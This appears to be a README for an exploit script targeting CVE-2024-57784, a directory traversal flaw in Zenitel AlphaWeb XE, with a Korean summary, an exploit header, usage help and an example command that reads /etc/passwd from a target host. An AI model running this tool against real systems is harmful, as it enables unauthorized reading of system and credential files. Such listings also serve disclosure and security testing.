
CVE-2024-57784에 대한 익스플로잇: Zenitel AlphaWeb XE 11.2.3.10의 인증된 디렉토리 트래버설. 대상 URL과 파일 경로를 사용한 HTTP GET 요청을 통해 원격 파일 읽기를 가능하게 합니다.
[*] Exploit Title: Authenticated Directory Traversal Vulnerability on Zenitel AlphaWeb XE Version 11.2.3.10
[*] Date: 08/02/2025
[*] Exploit Author: Safvan Parakkal
[*] Vendor Website: https://www.zenitel.com/
[*] CVE: CVE-2024-57784
usage: CVE-2024-57784.py [-h] -u URL -f FILE
optional arguments:
-h, --help show this help message and exit
-u URL, --url URL Target URL
-f FILE, --file FILE The file to read
Example : python3 CVE-2024-57784.py -u http://192.168.10.34 -f /etc/passwd